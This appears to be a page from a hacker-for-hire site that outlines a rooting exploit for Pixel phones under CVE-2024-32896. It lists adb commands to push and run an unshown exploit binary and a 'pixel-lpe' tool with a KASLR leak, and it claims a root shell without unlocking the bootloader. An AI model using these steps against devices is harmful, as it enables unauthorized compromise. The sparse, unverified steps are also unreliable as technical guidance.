[~]mobilehackerforhire$ hire --now
    Technical terminal background
    CVE-2024-32896
    22 min mhfh research 2024-06-18

    Rooting Pixel via Firmware Privilege Escalation

    Step-by-step exploitation of a Pixel-specific bootloader logic flaw to land a persistent root shell without unlocking the bootloader.

    $cat snippet_cve-2024-32896.sh
    adb shell /data/local/tmp/exploit.bin --trigger
./pixel-lpe --target=oriole --kaslr-leak

    Overview

    A logic flaw in Pixel-specific vendor firmware allows local privilege escalation to root without unlocking the bootloader.

    Setup

    $cat output.bash
    adb push exploit.bin /data/local/tmp/
adb shell chmod +x /data/local/tmp/exploit.bin

    Stage 1 — Trigger

    $cat output.bash
    adb shell /data/local/tmp/exploit.bin --trigger

    Stage 2 — KASLR leak & escalate

    $cat output.bash
    ./pixel-lpe --target=oriole --kaslr-leak

    After the leak we patch selinux_enforcing and spawn a root shell.

    Mitigation

    Apply the June 2024 Pixel security update.

    #Android#Pixel#LPE#Firmware